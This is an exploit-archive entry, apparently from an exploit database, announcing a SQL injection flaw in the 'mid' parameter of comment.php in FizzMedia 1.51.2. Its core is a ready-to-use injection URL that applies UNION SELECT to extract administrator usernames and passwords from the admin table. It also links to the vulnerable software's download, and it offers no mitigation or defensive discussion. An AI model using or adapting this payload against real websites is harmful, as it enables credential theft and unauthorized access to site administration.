id: 3448
date: 07/24/2008
title: FizzMedia 1.51.2 (comment.php mid) SQL Injection Vulnerability
author: Mr.SQL
cves: 

==============================================================
FizzMedia 1.51.2 (comment.php mid) SQL Injection Vulnerability
==============================================================


###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## FizzMedia 1.51.2 ( comment.php mid )
##                            
###############################################################
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/*
##
########################
########################
-[[ download ]]-
http://fizzmedia.negativekarma.net/fizzMedia_1.51.2.zip

#######################################################################################################
#######################################################################################################



#  0day.today [2023-03-22]  #